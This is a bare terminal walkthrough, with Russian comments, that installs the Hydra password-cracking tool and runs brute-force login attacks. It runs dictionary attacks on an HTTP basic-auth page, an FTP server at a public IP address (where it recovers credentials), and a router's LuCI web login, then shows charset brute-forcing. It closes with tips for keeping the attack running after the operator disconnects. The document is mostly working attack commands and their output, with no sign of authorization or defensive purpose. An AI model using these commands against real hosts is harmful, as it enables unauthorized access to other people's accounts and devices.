# yum install -y epel-release
$ yum install -y hydra

$ mkdir ~/hydra_src && cd ~/hydra_src
$ wget https://github.com/vanhauser-thc/thc-hydra/archive/master.zip && unzip master.zip && rm -f master.zip
$ cd thc-hydra-master/
$ yum install gcc mysql-devel libssh
# Для Debian - libmysqld-dev и libssh-dev
$ make clean && ./configure
$ make && make install
$ ./hydra -h
Hydra v8.2-dev 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -q        do not print messages about connection errors
  -U        service module usage details
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

$ cat twitter-banned.txt 500-worst-passwords.txt lower john.txt password | grep -v '^#' | sort -u > all_small_dic.txt

$ hydra -l admin -P ~/pass_lists/dedik_passes.txt -o ./hydra_result.log -f -V -s 80 192.168.1.2 http-get /private/
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-12 13:01:25
[DATA] max 16 tasks per 1 server, overall 64 tasks, 488 login tries (l:1/p:488), ~0 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target 192.168.1.2 - login "admin" - pass "!" - 1 of 488 [child 0]
[ATTEMPT] target 192.168.1.2 - login "admin" - pass "!!!" - 2 of 488 [child 1]
[ATTEMPT] target 192.168.1.2 - login "admin" - pass "!!!!" - 3 of 488 [child 2]
...
[ATTEMPT] target 192.168.1.2 - login "admin" - pass "administrat0r" - 250 of 488 [child 0]
[ATTEMPT] target 192.168.1.2 - login "admin" - pass "administrator" - 251 of 488 [child 2]
[ATTEMPT] target 192.168.1.2 - login "admin" - pass "administrator1" - 252 of 488 [child 13]
[80][http-get] host: 192.168.1.2   login: admin   password: admin
#                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[STATUS] attack finished for 192.168.1.2 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-12 13:01:26

$ cat ./hydra_result.log
# Hydra v8.1 run at 2015-08-12 13:01:25 on 192.168.1.2 http-get (hydra -l admin -P /root/pass_lists/dedik_passes.txt -o ./hydra_result.log -f -V -s 80 192.168.1.2 http-get /private/)
[80][http-get] host: 192.168.1.2   login: admin   password: admin
#                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

$ hydra -l admin -P ~/pass_lists/all_small_dic.txt -o ./hydra_result.log -f -V -s 21 178.72.83.246 ftp

[DATA] max 16 tasks per 1 server, overall 64 tasks, 4106 login tries (l:1/p:4106), ~4 tries per task
[DATA] attacking service ftp on port 21
[ATTEMPT] target 178.72.83.246 - login "admin" - pass "" - 1 of 4106 [child 0]
[ATTEMPT] target 178.72.83.246 - login "admin" - pass "!@#$%" - 2 of 4106 [child 1]
[ATTEMPT] target 178.72.83.246 - login "admin" - pass "!@#$%^" - 3 of 4106 [child 2]
[ATTEMPT] target 178.72.83.246 - login "admin" - pass "!@#$%^&" - 4 of 4106 [child 3]
...
[ATTEMPT] target 178.72.83.246 - login "admin" - pass "adminadmin" - 249 of 488 [child 5]
[ATTEMPT] target 178.72.83.246 - login "admin" - pass "administrat0r" - 250 of 488 [child 0]
[ATTEMPT] target 178.72.83.246 - login "admin" - pass "administrator" - 251 of 488 [child 14]
[21][ftp] host: 178.72.83.246   login: admin   password: adminadmin
#                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[STATUS] attack finished for 178.72.83.246 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-12 13:46:51

$ hydra -l root -P ~/pass_lists/dedik_passes.txt -o ./hydra_result.log -f -V -s 80 178.72.90.181 http-post-form "/cgi-bin/luci:username=^USER^&password=^PASS^:Invalid username"

Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-12 14:15:12
[DATA] max 16 tasks per 1 server, overall 64 tasks, 488 login tries (l:1/p:488), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 178.72.90.181 - login "root" - pass "!" - 1 of 488 [child 0]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "!!!" - 2 of 488 [child 1]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "!!!!" - 3 of 488 [child 2]
# ...
[ATTEMPT] target 178.72.90.181 - login "root" - pass "%username%1" - 18 of 488 [child 1]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "%username%12" - 19 of 488 [child 2]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "%username%123" - 20 of 488 [child 15]
[STATUS] 20.00 tries/min, 20 tries in 00:01h, 468 to do in 00:24h, 16 active

$ hydra -l root -x "5:9:a1\!@#" -o ./hydra_result.log -f -V -s 80 178.72.90.181 http-post-form "/cgi-bin/luci:username=^USER^&password=^PASS^:Invalid username"

Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-12 14:31:01
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 268865638400000 login tries (l:1/p:268865638400000), ~262564100000 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 178.72.90.181 - login "root" - pass "aaaaa" - 1 of 268865638400000 [child 0]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "aaaab" - 2 of 268865638400000 [child 1]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "aaaac" - 3 of 268865638400000 [child 2]
# ...
[ATTEMPT] target 178.72.90.181 - login "root" - pass "aaaa7" - 30 of 268865638400000 [child 0]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "aaaa8" - 31 of 268865638400000 [child 2]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "aaaa9" - 32 of 268865638400000 [child 1]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "aaaa@" - 33 of 268865638400000 [child 11]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "aaaa#" - 34 of 268865638400000 [child 4]
[ATTEMPT] target 178.72.90.181 - login "root" - pass "aaaba" - 35 of 268865638400000 [child 7]

$ hydra -bla -bla -bla -o ./hydra_result.log
# Нажимаем CTRL + Z
$ disown -h %1
# После этого отключаемся или продолжаем работу
# Для возврата к процессу перебора выполни '$ bg 1'

# Для того, чтоб после посмотреть работает ли гидра выполни:
$ ps ax | grep hydra

# А для того чтоб убить все процессы с гидрой:
$ for proc in $(ps ax | grep hydra | cut -d" " -f 1); do kill $proc; done;